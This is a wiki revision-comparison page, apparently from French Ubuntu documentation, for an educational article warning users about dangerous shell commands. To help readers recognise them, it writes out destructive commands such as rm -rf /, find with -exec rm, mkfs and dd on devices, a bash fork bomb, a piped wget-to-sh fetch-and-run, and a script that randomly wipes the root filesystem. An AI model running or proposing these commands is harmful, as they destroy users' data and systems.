Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Les deux révisions précédentes Révision précédente
Prochaine révision
Révision précédente
commandes_dangereuses [Le 08/10/2011, 13:14]
82.225.133.123 [Tarbomb]
commandes_dangereuses [Le 29/01/2024, 18:43] (Version actuelle)
krodelabestiole + note --no-preserve-root
Ligne 3: Ligne 3:
 ---- ----
  
-====== Les commandes dangereuses ====== ​+====== Les commandes dangereuses ======
  
 La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation. Cependant, certains utilisateurs malveillants peuvent donner des commandes dangereuses qui corrompent, voire détruisent le système, ou les données. L'​exécution d'une commande nécessite donc toujours la plus grande prudence (utiliser la commande [[man]], moteurs de recherche, attente d'un deuxième avis, etc.). La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation. Cependant, certains utilisateurs malveillants peuvent donner des commandes dangereuses qui corrompent, voire détruisent le système, ou les données. L'​exécution d'une commande nécessite donc toujours la plus grande prudence (utiliser la commande [[man]], moteurs de recherche, attente d'un deuxième avis, etc.).
Ligne 17: Ligne 17:
  
 ===== Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants ===== ===== Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants =====
 +
 Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci : Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci :
-Le danger de ces commandes est tout à fait évident : +Le danger de ces commandes est tout à fait évident :
 <note warning> <note warning>
-Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNEES ​ET VOTRE SYSTEME.</​note>​+Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNÉES ​ET VOTRE SYSTÈME.</​note>​
  
-En cas de doute, n'​hésitez pas à faire une sauvegarde de vos données sur un support externe tel qu'une clef USB, un disque dur USB, ou un CD/DVD enregistrable,​ et à vérifier que la sauvegarde ​à fonctionné.+En cas de doute, n'​hésitez pas à faire une sauvegarde de vos données sur un support externe tel qu'une clef USB, un disque dur USB, ou un CD/DVD enregistrable,​ et à vérifier que la sauvegarde ​fonctionné.
  
 Celles qui peuvent tout effacer (fichier système ou données personnelles) : Celles qui peuvent tout effacer (fichier système ou données personnelles) :
Ligne 35: Ligne 36:
 mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé). mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé).
 </​code>​ </​code>​
 +
 +<​note>​
 +Aujourd'​hui il existe tout de même une sécurité pour éviter que les bugs((voir ce [[https://​github.com/​ValveSoftware/​steam-for-linux/​issues/​3671|bug assez effroyable]] dans un ancien installeur de [[:Steam]] sur Linux par ex.)), les mauvaises manipulations,​ ou les mauvaises blagues autour de la fameuse commande ''​rm -rf /''​ entraînent des dégâts.
 +  * L'​option ''​%%--%%preserve-root''​ est activée par défaut.
 +  * Si par contre vous voyez l'​option ''​%%--%%no-preserve-root''​ quelque part sous vos yeux, mettez-vous en alerte maximale ! Il n'​existe aucune raison ordinaire d'​utiliser cette option.
 +</​note>​
  
 la commande la commande
Ligne 45: Ligne 52:
 Pourquoi ? Pourquoi ?
  
-  * rm est la commande de suppression des fichiers sous Gnu-Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( /​home/<​votreidentifiant/​ ) !+  * rm est la commande de suppression des fichiers sous Gnu/Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( /​home/<​votreidentifiant/​ ) !
 /dev/null est l'​équivalent de la corbeille définitive,​ tout fichier envoyé à cette sortie entraîne sa suppression. /dev/null est l'​équivalent de la corbeille définitive,​ tout fichier envoyé à cette sortie entraîne sa suppression.
  
Ligne 60: Ligne 67:
  
 Suppression du fichier labrador.jpeg (une image) Suppression du fichier labrador.jpeg (une image)
-au lieu d'​exécuter+au lieu d'​exécuter ​:
 <​code>​rm labrador.jpeg</​code>​ <​code>​rm labrador.jpeg</​code>​
  
Ligne 71: Ligne 78:
 <note warning> <note warning>
 Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.</​note>​ Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.</​note>​
- 
-Cliquer ici pour voir la commande avec une astuce en prime !! :\\ 
-[[nautilus#​ouvrir_un_fichier_en_tant_qu_administrateur| Ouvrir le gestionnaire de fichiers Nautilus avec tous les droits (root, super utilisateur)]] 
  
   * La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d'​exécuter une commande sur le résultat d'une recherche.   * La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d'​exécuter une commande sur le résultat d'une recherche.
 Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers. Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers.
 <​code>​sudo find / -name "​*"​ -exec rm {} \;</​code>​ <​code>​sudo find / -name "​*"​ -exec rm {} \;</​code>​
-De même pour rm qui est utilisé. +De même pour **rm** qui est utilisé.
 ===== Re-formatage ===== ===== Re-formatage =====
  
-Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide : +Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide :
  
 <​code>​ <​code>​
Ligne 92: Ligne 95:
 ===== Manipulation de périphériques de stockage ===== ===== Manipulation de périphériques de stockage =====
  
-Écrit des données sur le périphérique et peut entraîner la perte totale des données : +Écrit des données sur le périphérique et peut entraîner la perte totale des données :
  
 <​code>​ <​code>​
Ligne 103: Ligne 106:
 Exécute un grand nombre de processus jusqu'​à ce que le système gèle, ce qui vous force à faire un arrêt brutal et peut causer la corruption du système, ou d'​autres désagréments. Exécute un grand nombre de processus jusqu'​à ce que le système gèle, ce qui vous force à faire un arrêt brutal et peut causer la corruption du système, ou d'​autres désagréments.
  
-Avec le shell Bash : +Avec le shell Bash :
  
   :​(){:​|:&​};:​   :​(){:​|:&​};:​
Ligne 118: Ligne 121:
 Ce cas est extrêmement rare, puisque, sous Ubuntu du moins, une archive contenant plus d'un fichier se décompressera dans un nouveau dossier. Ce cas est extrêmement rare, puisque, sous Ubuntu du moins, une archive contenant plus d'un fichier se décompressera dans un nouveau dossier.
 <note important>​On parle ici de fichiers tar, mais c'est valable pour tous les formats de compression existant (zip, gzip, tar-gz etc...)</​note>​ <note important>​On parle ici de fichiers tar, mais c'est valable pour tous les formats de compression existant (zip, gzip, tar-gz etc...)</​note>​
-===== Décompression ​bomb =====+===== Decompression ​bomb =====
  
 Quelqu'​un vous demande d'​extraire une archive qui semble petite lors du téléchargement mais qui contient à la décompression des données d'une taille beaucoup plus considérable,​ au point de remplir votre disque dur. Vous ne devriez pas utiliser des données d'une source non-fiable. Quelqu'​un vous demande d'​extraire une archive qui semble petite lors du téléchargement mais qui contient à la décompression des données d'une taille beaucoup plus considérable,​ au point de remplir votre disque dur. Vous ne devriez pas utiliser des données d'une source non-fiable.
 +N'​hésitez pas à regarder ce que contient le fichier compressé **avant** la décompression.
 ===== Shell ===== ===== Shell =====
  
-Quelqu'​un vous donne le lien vers un script shell à exécuter. Il peut contenir n'​importe quelle commande (bénigne ou malveillante). Vous ne devriez pas exécuter du code de personnes à qui vous ne faites pas confiance : +Quelqu'​un vous donne le lien vers un script shell à exécuter. Il peut contenir n'​importe quelle commande (bénigne ou malveillante). Vous ne devriez pas exécuter du code de personnes à qui vous ne faites pas confiance :
  
   wget http://​une_adresse/​un_fichier   wget http://​une_adresse/​un_fichier
Ligne 131: Ligne 134:
   wget http://​une_adresse/​un_fichier -O- | sh   wget http://​une_adresse/​un_fichier -O- | sh
  
-=== Roulette russe ===+==== Roulette russe ====
  
 Une fois ce script lancé, vous avez une "​chance"​ sur 6 pour que tous les fichiers à la racine de votre système soient effacés. Faites attention à ce script et ses variantes ! Une fois ce script lancé, vous avez une "​chance"​ sur 6 pour que tous les fichiers à la racine de votre système soient effacés. Faites attention à ce script et ses variantes !
Ligne 138: Ligne 141:
 #!/bin/bash #!/bin/bash
 echo ""​ echo ""​
-! (( $RANDOM % 6 )) && rm -fr / || echo "You live" ​+! (( $RANDOM % 6 )) && rm -rf / || echo "You live" ​
 exit 0 exit 0
 </​code> ​ </​code> ​
Ligne 212: Ligne 215:
 La commande "sudo passwd root " peut vous faire perdre vos droits sudo !! La commande "sudo passwd root " peut vous faire perdre vos droits sudo !!
  
-8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("su root") et tapez :+8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("sudo -i") et tapez :
  
   adduser votre_username sudo   adduser votre_username sudo
Ligne 218: Ligne 221:
 ===== Conclusion ===== ===== Conclusion =====
  
-Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes,​ et il ne faut pas utiliser cette page comme une liste de vérification pour déterminer si une commande est dangereuse ou pas ! Cette page est simplement éducative, pour faire prendre conscience à l'​utilisateur ​de la dangerosité potentielle ​du shell. Toute commande ne doit être exécutée que si elle est sûre et si l'on comprend ce que l'on fait.+Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes,​ et il ne faut pas utiliser cette page comme une liste de vérification pour déterminer si une commande est dangereuse ou pas ! Cette page est simplement éducative, pour faire prendre conscience à l'​utilisateur ​du danger potentiel ​du shell. Toute commande ne doit être exécutée que si elle est sûre et si l'on comprend ce que l'on fait.
  
 Le meilleur moyen d'​évaluer les risques est probablement l'​utilisation de la commande [[:​man]]. ​ Le meilleur moyen d'​évaluer les risques est probablement l'​utilisation de la commande [[:​man]]. ​
Ligne 224: Ligne 227:
 ---- ----
  
-//​Contributeurs principaux : [[utilisateurs:​la tite gogole]], [[utilisateurs:​tshirtman]],​ [[utilisateurs:​morgen_stern]].//​+//​Contributeurs principaux : [[utilisateurs:​на_краю]], [[utilisateurs:​tshirtman]],​ [[utilisateurs:​morgen_stern]].//​
  
-//Basé sur « [[http://​ubuntuforums.org/​announcement.php?​f=359|ATTENTION ALL USERS: Malicious Commands]] » par jdong.//+//Basé sur « [[https://​ubuntuforums.org/​announcement.php?​f=359|ATTENTION ALL USERS: Malicious Commands]] » par jdong.//
  • commandes_dangereuses.1318072458.txt.gz
  • Dernière modification: Le 15/12/2011, 15:18
  • (modification externe)